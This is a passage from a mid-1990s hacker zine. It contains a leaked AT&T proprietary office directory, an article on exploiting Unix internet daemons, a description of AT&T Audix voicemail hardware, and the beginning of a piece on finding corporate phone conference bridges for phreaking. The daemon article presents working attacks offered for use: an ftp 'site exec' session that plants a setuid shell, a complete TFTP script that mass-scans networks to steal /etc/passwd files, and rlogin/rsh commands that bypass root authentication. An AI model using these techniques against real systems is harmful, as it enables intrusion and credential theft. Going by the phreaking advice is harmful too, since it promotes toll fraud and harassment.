AT&T-NS 55 ERIEVIEW PLAZA 4TH FL. CLEVELAND OH 44114 216-664-6500
|
||
ADP 7007 E. PLEASANT VALLEY INDEPNDNCE OH 44131 216-447-1980
|
||
NAT'L ACCOUNT 1 FIRST NAT'L PLAZA DAYTON OH 44502 513-449-7800
|
||
AT&T 7725 W. RENO AVE. OK. CITY OK 73126 405-491-3000
|
||
AT&T LGE BUS. MACHINES 2020 S.W. 4TH AVE. PORTLAND OR 97201 503-295-5000
|
||
AT&T MICROELECT 1220 SW GREENBURGH RD PORTLAND OR 97223 503-244-3883
|
||
AT&T COMMERCE CT. 4 STATION SQ. SUITE 770 PITTSBURGH PA 15219 412-338-4800
|
||
AT&T 4 GATEWAY CTR. SUITE 500 PITTSBURGH PA 15222 412-392-8200
|
||
AT&T 470 STREETS RUN RD. PITTSBURGH PA 15236 412-882-1845
|
||
HARRISBURG 2080 LINGLESTOWN RD. HARRISBURG PA 17110 717-540-7251
|
||
ALLENTOWN-BETHLEHEM 2255 AVE. A BETHLEHEM PA 18018 215-861-2700
|
||
AT&T-BL STC RT 222 BREINIGSVL PA 18103 215-391-2000
|
||
AT&T MICROELECT. 961 MARCON BLVD. ALLENTOWN PA 18103 215-266-2900
|
||
ALLENTOWN-BL 1247 SO. CEDAR CREST BLVD. ALLENTOWN PA 18103 215-770-2200
|
||
AT&T 1 IMPERIAL WAY 2ND FL. ALLENTOWN PA 18195 215-398-5800
|
||
AT&T 3 BALA PLAZA WEST BLDG. BALA CYNWD PA 19004 215-581-2400
|
||
AT&T 514 KAISER DR. FOLCROFT PA 19032 215-724-5250
|
||
AT&T 1800 JFK BLVD., SUITE 1300 PHILADELPH PA 19103 215-972-1300
|
||
KING OF PRUSSIA 601 ALLENDALE RD. KING OF PR PA 19406 215-768-2600
|
||
READING WORKS 2525 N. 12TH ST. READING PA 19604 215-939-7011
|
||
AT&T NASSAU RECYCLE 4201 W. COLUMBIA CASEY SC 29033 803-796-4720
|
||
AT&T 1201 MAIN ST. 22ND FL. COLUMBIA SC 29201 803-733-3800
|
||
AT&T 111 WESTWOOD PL. 3RD FL. BRENTWOOD TN 37027 615-377-4000
|
||
AT&T MICROELECT. 195 POLK AVE. NASHVILLE TN 37211 615-749-8222
|
||
AT&T REPAIR CTR 653 MAINSTREAM DR. NASHVILLE TN 37228 615-242-1950
|
||
NASHVILLE MSL 566 MAINSTREAM DR. NASHVILLE TN 37228 615-256-4111
|
||
AT&T 9041 EXECUTIVE PARK KNOXVILLE TN 37923 615-690-3400
|
||
AT&T-NS SALES 909 E.LAS COLINAS BLVD IRVING TX 75039 214-401-4700
|
||
DALLAS WORKS 3000 SKYLINE DRIVE MESQUITE TX 75149 214-284-2000
|
||
AT&T-NS 1201 MAIN ST. SUITE 2555 DALLAS TX 75202 214-745-4790
|
||
AT&T 5525 LBJ FREEWAY DALLAS TX 75240 214-308-2000
|
||
AT&T 2501 PARKVIEW DR., SUITE 200 FT.WORTH TX 76102 817-870-4400
|
||
AT&T-NS 2900 N. LOOP WEST HOUSTON TX 77092 713-956-4400
|
||
AT&T CITYVIEW 10999 IH 10 W SAN ANTON TX 78230 512-691-5700
|
||
AT&T 5444 S. STAPLES CORPUS CHR TX 78411 512-994-4400
|
||
AT&T 8911 CAP. OF TEX HGHWY AUSTIN TX 78759 512-343-3000
|
||
AT&T 415 WEST 8TH ST. SUITE 307 AMARILLO TX 79101 806-374-9435
|
||
AT&T-BMG 3000 N. GARFIELD SUITE 180 MIDLAND TX 79705 915-687-8700
|
||
AT&T-NS 10521 ROSEHAVEN ST. FAIRFAX VA 22030 703-352-0900
|
||
AT&T-NS 12450 FAIR LAKES CIRCLE FAIRFAX VA 22033 703-631-3288
|
||
AT&T-BELL LABS 1201 S. HAYES ST. ARLINGTON VA 22202 703-769-8900
|
||
AT&T 1550 WILSON BLVD. ARLINGTON VA 22209 703-247-4690
|
||
AT&T FED SYS 1201 S. HAYES ST. ARLINGTON VA 22209 703-685-8678
|
||
AT&T MAJOR MKT & SALES 600 EAST BROAD ST. RICHMOND VA 23219 804-775-3300
|
||
AT&T OSO 1530 E. RUN RD. RICHMOND VA 23228 804-262-4062
|
||
RICHMOND WORKS 4500 S. LABURNUM AVE. RICHMOND VA 23231 804-226-5000
|
||
AT&T 1338 PLANTATION RD NE ROANOKE VA 24012 703-344-1160
|
||
NEW RIVER VALLEY CALLER 21 RADFORD VA 24143 703-731-8000
|
||
AT&T 2901 THIRD AVE. SEATTLE WA 98121 206-443-7000
|
||
AT&T ACCT MGMT 2121 4TH AVE. SEATTLE WA 98121 206-728-4749
|
||
AT&T N. 9 POST SUITE 330 SPOKANE WA 99201 509-747-6110
|
||
AT&T 400 S. EXECUTIVE DR. BROOMFIELD WI 53005 414-785-9110
|
||
MILWAUKEE CP/ASSEM.CTR MILWAUKEE WI 53212 414-963-8200
|
||
AT&T 2802 INTERNAT'L LN, 2ND FLR MADISON WI 53704 608-241-8900
|
||
AT&T 900 PENNSYLVANIA AVE. CHARLESTON WV 25302 304-347-2000
|
||
MARTINSBURG MMC TABLER STA.RD. MARTINSBRG WV 25401 304-263-6931
|
||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||
|
||
And remember...
|
||
|
||
All directory information is classified AT&T Proprietary and, as such, should
|
||
be safeguarded as outlined in GEI 2.2. Responsibility for security is passed
|
||
on to each employee receiving the directory.
|
||
|
||
|
||
<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
|
||
|
||
|
||
|
||
Playing with the Internet Daemons
|
||
|
||
by
|
||
|
||
Voyager [TNO]
|
||
|
||
|
||
Internet hosts communicate with each other using either TCP
|
||
(Transmission Control Protocol) or UDP (User Datagram Protocol) on top
|
||
of IP (Internet Protocol). Other protocols are used on top of IP, but
|
||
TCP and UDP are the ones that are of interest to us. On a Unix system,
|
||
the file /etc/protocols will list the available protocols on your
|
||
machine
|
||
|
||
On the Session Layer (OSI model) or the Internet Layer (DOD Protocol
|
||
Model) data is moved between hosts by using ports. Each data
|
||
communication will have a source port number and a destination port
|
||
number. Port numbers can be divided into two types, well-known ports
|
||
and dynamically allocated ports. Under Unix, well-known ports are
|
||
defined in the file /etc/services. In addition, RFC (Request For
|
||
Comments) 1700 "Assigned Numbers" provides a complete listing of all
|
||
well-known ports. Dynamically allocated port numbers are assigned as
|
||
needed by the system.
|
||
|
||
Unix provides the ability to connect programs called daemons to
|
||
well-known ports. The remote computer will connect to the well-known
|
||
port on the host computer, and be connected to the daemon program.
|
||
|
||
Daemon programs are traditionally started by inetd (The Internet
|
||
Daemon). Daemon programs to be executed are defined in the inetd
|
||
configuration file, /etc/inetd.conf.
|
||
|
||
Most of these daemons run as a priveledged user, often as root. Many of
|
||
these programs have vulnerabilities which can be exploited to gain access
|
||
to remote systems.
|
||
|
||
The daemons we are interested in are:
|
||
|
||
Service Port Number Description
|
||
~~~~~~~~~~~~~ ~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||
ftp 21 File Transfer [Control]
|
||
smtp 25 Simple Mail Transfer Protocol
|
||
tftp 69 Trivial File Transfer Protocol
|
||
finger 79 Finger
|
||
www-http 80 World Wide Web HTTP
|
||
sunrpc 111 SUN Remote Procedure Call
|
||
fln-spx 221 Berkeley rlogind with SPX auth
|
||
rsh-spx 222 Berkeley rshd with SPX auth
|
||
netinfo 716-719 NetInfo
|
||
ibm-res 1405 IBM Remote Execution Starter
|
||
nfs 2049 Network File System
|
||
x11 6000-6063 X Window System
|
||
|
||
rcp/rshd Remote Copy/Remote Shell Daemon
|
||
nis Network Information Services
|
||
|
||
|
||
|
||
|
||
|
||
The next part of this article will focus on specific daemons and their
|
||
known vulnerabilities. The vulnerabilities with brief explanations will be
|
||
explained here. For the more complicated exploits, which are beyond the
|
||
scope of a concise article, more research will be required on the part of
|
||
the reader.
|
||
|
||
|
||
|
||
--> ftp 21 File Transfer [Control]
|
||
|
||
FTP is the File Transfer Protocol. FTP requests are answered by the FTP
|
||
daemon, ftpd. wuarchive's ftpd versions below 2.2 have a vulnerability
|
||
where you can execute any binary you can see with the 'site exec'
|
||
command by calling it with a relative pathname with "../" at the
|
||
beginning. Here is a sample exploit:
|
||
|
||
Login to the system via ftp:
|
||
|
||
220 uswest.com FTP server (Version wu-2.1(1) ready.
|
||
Name (uswest.com:waltman): waltman
|
||
331 Password required for waltman.
|
||
Password: jim
|
||
230 User waltman logged in.
|
||
Remote system type is UNIX.
|
||
Using binary mode to transfer files.
|
||
ftp> quote "site exec cp /bin/sh /tmp/.tno"
|
||
200-cp /bin/sh /tmp/tno
|
||
ftp> quote "site exec chmod 6755 /tmp/.tno"
|
||
200-chmod 6755 /tmp/tno
|
||
ftp> quit
|
||
221 Goodbye.
|
||
|
||
|
||
|
||
--> smtp 25 Simple Mail Transfer Protocol
|
||
|
||
Mail attacks are one of the oldest known methods of attacking Internet
|
||
hosts. The most common mail daemon, and least secure, is sendmail. Other
|
||
mail daemons include smail, MMDF,and IDA sendmail. Sendmail has had too
|
||
many vulnerabilities to list them all. There is an entire FAQ written
|
||
specifically on sendmail vulnerabilities, therefore we will not cover them
|
||
heavily here.
|
||
|
||
One well known vulnerability, useful only for historical purposes, is
|
||
"Wizard Mode." In Wizard mode you could request a shell via Port 25
|
||
(The SMTP port). No modern system will be vulnerable to this attack. To
|
||
exploit this vulnerability, you telnetted to port 25, typed WIZ to enter
|
||
Wizard mode, and entered the password. The problem related to the way
|
||
the encrypted password was stored. There was a bug that caused the
|
||
system to believe that no password was as good as the real password.
|
||
|
||
To quote Steven Bellovin:
|
||
|
||
The intended behavior of wizard mode was that if you supplied
|
||
the right password, some other non-standard SMTP commands were
|
||
enabled, notably one to give you a shell. The hashed password
|
||
-- one-way encrypted exactly as per /etc/passwd -- was stored in
|
||
the sendmail configuration file. But there was this bug; to
|
||
explain it, I need to discuss some arcana relating to sendmail
|
||
and the C compiler.
|
||
|
||
In order to save the expense of reading and parsing the
|
||
configuration file each time, sendmail has what's known as a
|
||
``frozen configuration file''. The concept is fine; the
|
||
implementation isn't. To freeze the configuration file,
|
||
sendmail just wrote out to disk the entire dynamic memory area
|
||
(used by malloc) and the `bss' area -- the area that took up no
|
||
space in the executable file, but was initialized to all zeros
|
||
by the UNIX kernel when the program was executed. The bss area
|
||
held all variables that were not given explicit initial values
|
||
by the C source. Naturally, when delivering mail, sendmail just
|
||
read these whole chunks back in, in two giant reads. It was
|
||
therefore necessary to store all configuration file information
|
||
in the bss or malloc areas, which demanded a fair amount of care
|
||
in coding.
|
||
|
||
The wizard mode password was stored in malloc'ed memory, so it
|
||
was frozen properly. But the pointer to it was explicitly set
|
||
to NULL in the source:
|
||
|
||
char *wiz = NULL;
|
||
|
||
That meant that it was in the initialized data area, *not* the
|
||
bss. And it was therefore *not* saved with the frozen
|
||
configuration. So -- when the configuration file is parsed and
|
||
frozen, the password is read, and written out. The next time
|
||
sendmail is run, though, the pointer will be reset to NULL.
|
||
(The password is present, of course, but there's no way to find
|
||
it.) And the code stupidly believed in the concept of no
|
||
password for the back door.
|
||
|
||
One more point is worth noting -- during testing, sendmail did
|
||
the right thing with wizard mode. That is, it did check the
|
||
password -- because if you didn't happen to do the wizard mode
|
||
test with a frozen configuration file -- and most testing would
|
||
not be done that way, since you have to refreeze after each
|
||
compilation -- the pointer would be correct.
|
||
|
||
|
||
|
||
--> tftp 69 Trivial File Transfer Protocol
|
||
|
||
tftp is the Trivial File Transfer Protocol. tftp is most often used to
|
||
attempt to grab password files from remote systems. tftp attacks are so
|
||
simple and repetitive that scripts are written to automate the process
|
||
of attacking entire domains. Here is one such script:
|
||
|
||
#!/bin/sh
|
||
########################################################################
|
||
# TFTP snagger by Yo
|
||
# It snags /etc/passwd files from all hosts with open 69 (tftp) port.
|
||
# scans all hosts from XX.XX.0.0 - XX.XX.255.255
|
||
# you can run it in the background in following way:
|
||
# snag [hostname] > /dev/null &
|
||
# [hostname] might be used IP # (with -ip option) as well as FQDN
|
||
# Last Updated 10/20/92
|
||
#
|
||
# Highly modified by ThePublic on 10/21/92
|
||
########################################################################
|
||
case $1 in
|
||
'')
|
||
echo " Usage: $0 [hostname] to run in the foreground "
|
||
echo " $0 [hostname] > /dev/null & to run in the background "
|
||
echo " The [hostname] can be specialized in fully qualified domain name "
|
||
echo " i.e.- $0 nyx.cs.du.edu - and it'll scan all du.edu domain. "
|
||
echo " as well as IP with -ip option. "
|
||
exit 1
|
||
;;
|
||
-ip)
|
||
if [ $2x = x ]; then
|
||
echo " Usage: $0 $1 the IP "
|
||
exit 1
|
||
else
|
||
x=`echo $2 | cut -d. -f1`
|
||
xx=`echo $2 | cut -d. -f2`
|
||
xxx=`echo $2 | cut -d. -f3`
|
||
xxxx=`echo $2 | cut -d. -f4`
|
||
# ^ field delimiter is '.' -- get field 1/2/3/4
|
||
fi;;
|
||
*)
|
||
if [ ! -f /usr/ucb/nslookup ] && [ ! -f /usr/local/bin/nslookup ]; then
|
||
# -x is for SunOs
|
||
echo sorry dude, no nslookup server .. try it with -ip option.
|
||
exit 1
|
||
fi
|
||
x1=`nslookup $1 | fgrep "Address" | cut -c11-17 | tail -1`
|
||
# ^ 7 chars ^ last line
|
||
if [ "$x1" = '' ]; then
|
||
echo " There is no such domain. Nothing to scan. Exit. "
|
||
exit 1
|
||
fi
|
||
x=`echo $x1 | cut -d. -f1` # get the first set of #, ##, or ###
|
||
xx=`echo $x1 | cut -d. -f2` # get the second set
|
||
xxx=0 # ignore the rest, if any
|
||
xxxx=0
|
||
;;
|
||
esac
|
||
if [ $x -lt 1 ] || [ $x -ge 255 ] || [ $xx -lt 1 ] || [ $xx -ge 255 ]; then
|
||
echo There is no such domain. Nothing to scan.
|
||
exit 1
|
||
fi
|
||
while [ $x -ne 255 ]; do
|
||
|
||
while [ $xx -ne 255 ]; do
|
||
while [ $xxx -ne 255 ]; do
|
||
while [ $xxxx -ne 255 ]; do
|
||
target=$x.$xx.$xxx.$xxxx
|
||
trap "echo The Process was stopped at $target;rm -rf passwd.$target; exit 1" 2
|
||
tftp << EOF
|
||
c $target
|
||
mode ascii
|
||
trace
|
||
get /etc/passwd passwd.$target
|
||
quit
|
||
EOF
|
||
if [ ! -s passwd.$target ] ; then
|
||
rm -rf passwd.$target
|
||
echo `date` $target has rejected an attempt >> .info
|
||
else
|
||
mv passwd.$target .good.$target
|
||
echo `date` $target is taken, all data is stored in .good.$target file >> .info
|
||
fi
|
||
xxxx=`expr $xxxx + 1 `
|
||
done
|
||
xxxx=0
|
||
xxx=`expr $xxx + 1 `
|
||
done
|
||
xxx=0
|
||
xx=`expr $xx + 1 `
|
||
done
|
||
xx=0
|
||
x=`expr $x + 1 `
|
||
done
|
||
|
||
|
||
|
||
--> finger 79 Finger
|
||
|
||
The finger command displays information about another user, such as login
|
||
name, full name, terminal name, idle time, login time, and location if
|
||
known. finger requests are answered by the fingerd daemon.
|
||
|
||
Robert Tappan Morris's Internet Worm used the finger daemon. The finger
|
||
daemon allowed up to 512 bytes from the remote machine as part of the
|
||
finger request. fingerd, however, suffered from a buffer overflow bug
|
||
caused by a lack proper bounds checking. Anything over 512 got
|
||
interpreted by the machine being fingered as an instruction to be
|
||
executed locally, with whatever privileges the finger daemon had.
|
||
|
||
|
||
|
||
--> www-http 80 World Wide Web HTTP
|
||
|
||
HTML (HyperText Markup Language) allows web page user to execute
|
||
programs on the host system. If the web page designer allows the web
|
||
page user to enter arguments to the commands, the system is vulnerable
|
||
to the usual problems associated with system() type calls. In addition,
|
||
there is a vulnerability that under some circumstances will give you an
|
||
X-Term using the UID that the WWW server is running under.
|
||
|
||
|
||
|
||
--> sunrpc 111 SUN Remote Procedure Call
|
||
|
||
Sun RPC (Remote Procedure Call) allows users to execute procedures on
|
||
remote hosts. RPC has suffered from a lack of secure authentification.
|
||
To exploit RPC vulnerabilities, you should have a program called "ont"
|
||
which is not terribly difficult to find.
|
||
|
||
|
||
|
||
--> login 513 Remote login
|
||
|
||
Some versions of AIX and Linux suffer from a bug in the way that
|
||
rlogind reads arguments. To exploit this vulnerability, issue this
|
||
command from a remote system:
|
||
|
||
rlogin host -l -froot
|
||
|
||
Where host is the name of the target machine and username is the username
|
||
you would like to rlogin as (usully root). If this bug exists on the
|
||
hosts system, you will be logged in, without being asked for a password.
|
||
|
||
|
||
|
||
--> rsh-spx 222 Berkeley rshd with SPX auth
|
||
|
||
Some versions of Dynix and Irix have a bug in rshd that allows you to
|
||
run commands as root. To exploit this vulnerability, issue this command
|
||
from the remote system:
|
||
|
||
rsh host -l "" /bin/sh
|
||
|
||
|
||
|
||
--> netinfo 716-719 NetInfo
|
||
|
||
NeXT has implemented a protocol known as NetInfo so that one NeXT
|
||
machine can query another NeXT machine for information. A NetInfo
|
||
server will by default allow unrestricted access to system databases.
|
||
This can be fixed by the System Administrator. One of the pieces of
|
||
information netinfo will give up is the password file.
|
||
|
||
|
||
|
||
--> ibm-res 1405 IBM Remote Execution Starter
|
||
|
||
rexd (the remote execution daemon) allows you to execute a program on
|
||
another Unix machine. AIX, NeXT and HPUX versions of rexd have suffered
|
||
from a vulnerability allowing unintended remote execution. The rexd
|
||
daemon checks your uid on the machine you are coming from, therefore you
|
||
must be root on the machine you are mounting the rexd attack from. To
|
||
determine if your target machine is running rexd, use the 'rcp -p
|
||
<target>' command. You will also need the exploit program known as 'on'
|
||
which is available on fine H/P boards everywhere.
|
||
|
||
|
||
|
||
--> nfs 2049 Network File System
|
||
|
||
NFS, the Network File System, from Sun Microsystems has suffered from
|
||
multiple security vulnerabilities. In addition, many system
|
||
administrators configure NFS incorrectly, allowing unintended remote
|
||
access.
|
||
|
||
Using the command 'showmount -e <target>' you can view what file systems
|
||
are exported from a machine. Many administrators allow read access to
|
||
the /etc directory, allowing you to copy the password file. Other
|
||
administrators allow write access to user directories, allowing you to
|
||
create .rhosts files and gain access to the machine via rlogin or rsh.
|
||
|
||
In addition to configuration issues, NFS is vulnerable to attacks using
|
||
a uid masking bug, a mknod bug, and a general file handle guessing
|
||
attack. Several hacked versions of the mount command have been written
|
||
to exploit known vulnerabilities.
|
||
|
||
|
||
|
||
--> x11 6000-6063 X Window System
|
||
|
||
X-Windows has suffered and currently suffers from numerous
|
||
vulnerabilities. One vulnerability allows you to access another users
|
||
display, another allows you to view another users keystrokes. Another
|
||
vulnerability allows a remote attacker to run every program that the
|
||
root user starts in his or her .xsession file. Yet another X-Windows
|
||
vulnerability allows a local user to create a root entry in the
|
||
/etc/passwd file.
|
||
|
||
|
||
|
||
--> rcp
|
||
|
||
The SunOS 4.0.x rcp utility can be exploited by any trusted host listed
|
||
in /etc/hosts.equiv or /.rhosts. To exploit this hole you must be
|
||
running NFS (Network File System) on a Unix system or PC/NFS on a DOS
|
||
system.
|
||
|
||
|
||
|
||
--> NIS
|
||
|
||
Sun's NIS (Network Information Service) also known as yp (Yellow Pages)
|
||
has a vulnerability where you can request an NIS map from another NIS
|
||
domain if you know the NIS domain name of the target system. There is
|
||
no way to query a remote system for it's NIS domainname, but many NIS
|
||
domain names are easily guessable. The most popular NIS map to request
|
||
is passwd.byname, the NIS implementation of /etc/passwd. In addition,
|
||
if you have access to a diskless Unix workstation, you can determine the
|
||
NIS domain name of the server it boots from.
|
||
|
||
+--------------------------------------------------------+
|
||
+ Do not confuse NIS domain names with DNS domain names! |
|
||
+--------------------------------------------------------+
|
||
|
||
|
||
|
||
--> Other attacks
|
||
|
||
In addition to these daemon based attacks, many other methods can be
|
||
used to gain access to a remote computer. These include, but are not
|
||
limited to: default accounts, password guessing, sniffing, source
|
||
routing, DNS routing attacks, tcp sequence prediction and uucp
|
||
configuration exploits.
|
||
|
||
This should give you an idea on how daemon based attacks function. By
|
||
no means is this a complete list of security vulnerabilities in
|
||
privileged internet daemons. To discover more information about how
|
||
these daemons operate, and how to exploit their vulnerabilities, I
|
||
highly recommend reading source code, man pages and RFC's.
|
||
|
||
|
||
Voyager[TNO]
|
||
|
||
|
||
<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
|
||
|
||
|
||
|
||
[][][][][][][][][][][][][][][][][][][][][][]
|
||
[[[ ]]]
|
||
[[[[ THE DEFINITY AUDIX VMS INSIDE OUT ]]]]
|
||
[[[[[ ]]]]]
|
||
[[[[[[[ by: Boba Fett ]]]]]]]
|
||
[[[[[[[[[[[ ]]]]]]]]]]]
|
||
[][][][][][][][][][][][][][][][][][][][][][]
|
||
|
||
|
||
- " What?! Another crummy file on the Audix voice mail? "
|
||
|
||
Not exactly. In COTNO #1, you will find a good article on identifying and
|
||
obtaining mailboxes on the Audix Voice Mail System (VMS). This paper will
|
||
discuss the physical/electrical design of the Audix System and how it's
|
||
integrated with the Definity switch. I will not discuss how to obtain
|
||
dialups to the audix or hacking it, that's another file :). Most of the
|
||
information and diagrams in this paper where gathered from various sources.
|
||
Mainly, the AT&T Tech. Journal may/june 1994, and some very cooperative AT&T
|
||
representatives. ;)
|
||
|
||
|
||
1) Hardware
|
||
-----------
|
||
|
||
All right, what does this baby look like? Well, all in all, it's quite simple.
|
||
There are 4 major components, all of which can be easily replaced or removed.
|
||
A tape drive, a hard disk and 2 circuit boards. Here's what the Definity Audix's
|
||
front panel looks like.
|
||
|
||
|
||
Disk/Alarm board MFB panel
|
||
|
||
.---------------------.__.-----.
|
||
| _______________ | | |
|
||
| | | | | o <----- Red LED
|
||
| | | | | |
|
||
| | ||| | | | O <---------- "Enter/yes" Button
|
||
| | ||| | | | __ |
|
||
Tape ----->| |||| | | | || |
|
||
Unit | | |||| | | | || |
|
||
| | ||| | | | || <----- Alphanumeric liquid
|
||
| | ||| | | | || | crystal display(10 character)
|
||
| | ||| | | | -- |
|
||
| --------------- | | O <---- "Next/no" button
|
||
| | | |
|
||
| | | |
|
||
Boot/ -----------------> O | | O <---- "Back" button
|
||
shutdown | | |Back |
|
||
button | .--------. | | |
|
||
| | Some | | | |
|
||
| | stupid | _ | | _ |
|
||
| | warning| | | | | | <-------------- Handles/
|
||
| | label. | | | | | | | | / latch
|
||
| |________| | <----------------
|
||
.________________|_|__|--|_|_|_|
|
||
|
||
|
||
As you can see, it consists of two boards: The multifunction board (right), and
|
||
the disk/alarm board (left).
|
||
|
||
o MFB major components:
|
||
|
||
- A 386 processor (supports Unix System V) with 16 megs of dynamic
|
||
RAM (DRAM).
|
||
- An array of six 50 mhz digital signal processors (DSPs).
|
||
- The Definity switch time-division multiplexed (TDM) bus interface.
|
||
- An alarm monitoring processor. :(
|
||
|
||
o D/ALB major components:
|
||
|
||
- A tape drive
|
||
- A Hard Drive
|
||
- An online modem for REMOTE ALARM NOTIFICATION, AND REMOTE MAINTENANCE.
|
||
|
||
|
||
The modem is included with the package. If the on-board modem does not
|
||
comply with the local telco rules (for example foreign countries) , than
|
||
through the RS-232 port an external one can be attached. Let's take a deeper
|
||
look inside and see where the components go.
|
||
|
||
.--------------------------------------.
|
||
/| + Disk/Alarm Board + |__Tip/Ring
|
||
.--------. / | .------------------remote acs ports--|___RS-232
|
||
| | / | | |
|
||
| | / | | .------|--------|--------Ethernet----- LAN
|
||
|S | / | | | Tape System Disk controller|
|
||
|W | / |_|__|_________________________________|
|
||
|I |/ |-|--|---------------------------------|
|
||
|T|======| | | | + Multifunction Board + |
|
||
|C| Audix| | | | |
|
||
|H|======| | | | /============== RS-232
|
||
| |\ | | SCSI 386 Serial Data Packet |
|
||
|________| \ | | Interface CPU async/sync. bus |--- Packet
|
||
\ | | -|-----------|-------|------inter- | Bus
|
||
\ | | | 16 Meg DMA face |
|
||
\ | Faceplate RAM | \ | |
|
||
\ | & Control | \ TDM |
|
||
\ | 3 DSP 32Cs---Interface|--- TD bus
|
||
\______________________________________|
|
||
|
||
|
||
o Explanation of some terms:
|
||
|
||
CPU: Central Processing Unit
|
||
DSP: Digital Signal Processor
|
||
TDM: Time-Division Multiplexed
|
||
DMA: Direct Memory Access
|
||
SCSI: Small Computer System Interface
|
||
|
||
The Definity Audix VMS is so compact because it has to fit in the Definity
|
||
PBX's port slot. It can: detect a incoming call, detect when the caller has
|
||
disconnected, disconnect a call on ANY port. It can also, disable any port to
|
||
prevent it from receiving incoming calls, and most important of all, it can
|
||
originate outgoing calls. It is also good to know that it has CLID.
|
||
Here's a list of it's functions:
|
||
|
||
- Call History Information (Called Party ID,Calling party ID and
|
||
reason for call).
|
||
- Integrated message waiting notification (LED).
|
||
- Disconnect message (Contact Administrator for help, please disconnect
|
||
goodbye).
|
||
- Message waiting status information (Updated on activity, Audit of
|
||
each vmb and refresh of all vmbs).
|
||
- Maintenance info. for link.
|
||
- Audix control of port. (disconnect call, detect caller, etc..)
|
||
|
||
I've been referring to it as the Definity Audix, and not just Audix. Audix,
|
||
(aka Audix release 1), was first introduced in 1984. The Definity Audix,
|
||
however, was introduced in 1992, and came with a series of more advanced
|
||
features. For example, the time scale modification option was improved, allowing
|
||
the playback of messages at slower or faster speeds. Or the speech
|
||
encoder/decoder algorithm which was changed resulting in better sound quality
|
||
(so they say). How can you tell if it's a Definity when calling it remotely?
|
||
Well, quite frankly I'm not sure. There is a way, however, it isn't very easy to
|
||
apply. The Audix, release 1 system takes approx. 1 second to detect your DTMF
|
||
tones. Now, the Definity, on the other hand, takes only about 25 milliseconds,
|
||
less than half the time. You can time the reaction, and figure out what your
|
||
dealing with, but there are many things that can affect the response time also
|
||
(for example, the amount of people using the voice mail). As you can see
|
||
this method isn't very reliable.
|
||
|
||
2) Software
|
||
-----------
|
||
|
||
The system software resides on a single 160 meg casettee tape. It is loaded
|
||
on the hard disk whenever an installation or upgrade is being performed.
|
||
There is also a big part of the code, which constantly monitors multiple
|
||
thermal sensors on the two circuit packs, making sure that they don't over
|
||
heat.
|
||
|
||
The chick's sweet voice you hear when interacting with the VMS, is composed
|
||
of multiple fragments. A fragment can be a single word, a complete sentence,
|
||
or a bunch of sentences. For example, "Please enter extension and pound sign"
|
||
is most likely to be two fragments. The first being "please enter extension"
|
||
and the second being "and pound sign". Obviously, this is used to save space.
|
||
A second recording is: "Enter password and pound sign", the "and pound sign"
|
||
is the same fragment as in the first one. Since AT&T sells it's Audix system
|
||
in nearly 80 countries, there are a couple of different language tapes also.
|
||
So don't be surprised if you encounter a Spanish or Japanese Audix VMS.
|
||
Currently AT&T offers ten language tapes and the Definity Audix can support
|
||
up to nine different language tapes simultaneously.
|
||
|
||
|
||
"So if it's an Audix voice mail then there's a Definity PBX, right? "
|
||
|
||
Wrong. Even though it fits the Definity PBX like a glove, it can be integrated
|
||
with other switches. Some of the most common are:
|
||
|
||
- G3I - System 25
|
||
- G3S - System 75
|
||
- G3R - System 85
|
||
|
||
I'm not sure about NorTel switches such as the SL-1, some people say yes,
|
||
while others say that only AT&T switches can be integrated with Audix. If
|
||
anyone knows, please let me know. Comments or suggestions are welcome.
|
||
|
||
|
||
- Boba Fett
|
||
|
||
<EOF>
|
||
<05/23/95>
|
||
|
||
|
||
<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
|
||
|
||
|
||
|
||
/\
|
||
\/
|
||
Bridging the Gap
|
||
/\-------------------------/\
|
||
\/-------------------------\/
|
||
Eddie Van Halen
|
||
/\
|
||
\/
|
||
|
||
|
||
INTRODUCTION
|
||
------------
|
||
First of all I wrote this because for one thing I am SICK AND TIRED of sitting
|
||
on irc and seeing "k0nPhiNf0!?" pumped through my terminal every five seconds.
|
||
Then,once they get the k0nPh iNf0, I am forced to constantly hear from the
|
||
k0nPh people about how "DiZ k0nPh sUx!". People give me k0nPh info all the
|
||
time but I NEVER call into them. Why? Because these days,they DO suck. It
|
||
seems the underground world have completely forgotten about what use to be
|
||
the best way to conference - BRIDGE's.
|
||
|
||
|
||
ABOUT BRIDGES
|
||
-------------
|
||
I'm sure everyone reading this knows what a bridge is. Whether they know the
|
||
best way to get them is another thing. I do, however, run across the
|
||
occasional irc'er that /msgs me with "whats a bridge?" when I bring up the
|
||
subject.
|
||
|
||
Bridges are just about the same as k0nPhz, except they are usually owned and
|
||
used by big businesses and schools on their own telephone equipment. This
|
||
equipment is usually integrated into their voice mail and/or PBX computers
|
||
and allows the company or school to hold teleconferences without relying on
|
||
the national teleconference providers.
|
||
|
||
For those out there (if any?) that remember the 904-348 bridge, it was a
|
||
System 75 PBX bridge used by a home school, where the students would call in
|
||
in the daytime and take tests and attend classes. The way it was used was as
|
||
follows:
|
||
|
||
You would dial 348-XX00 to 348-XX19. That was ONE of the bridges.
|
||
Anybody that connected to any number from 00 to 19 would be connected
|
||
to the bridge. If two people tried to connect to the same number, it
|
||
would be busy. Thus, it had 20 lines. A second bridge was reached at
|
||
348-XX20 to 348-XX29. This was off the same system, but gave you a
|
||
different bridge with 10 lines. Yet another bridge could be found at
|
||
348-XX30 to 348-XX69 off the same system.
|
||
|
||
You could call in during the daytime and mess with the teachers and kids or
|
||
whatever, but occasionally they would hang you up, or call you back or
|
||
something. This one went down because it wasn't blocked from collect calls,
|
||
and the number got very widespread throughout the k0d3lyN3 and BBS world and
|
||
was constantly collect-called by lamers who didn't know how to phreak. It is,
|
||
however, occasionally up for the students to use, but goes down as soon class
|
||
is over.
|
||
|
||
FINDING A BRIDGE.
|
||
-----------------
|
||
Finding a bridge use to be the easiest thing for me. It used to be, like,
|
||
WHAT I DID. I would put one up on my codeline, and spread it to the others,
|
||
and would call into QSD or Lutz or something about 30 minutes afterward
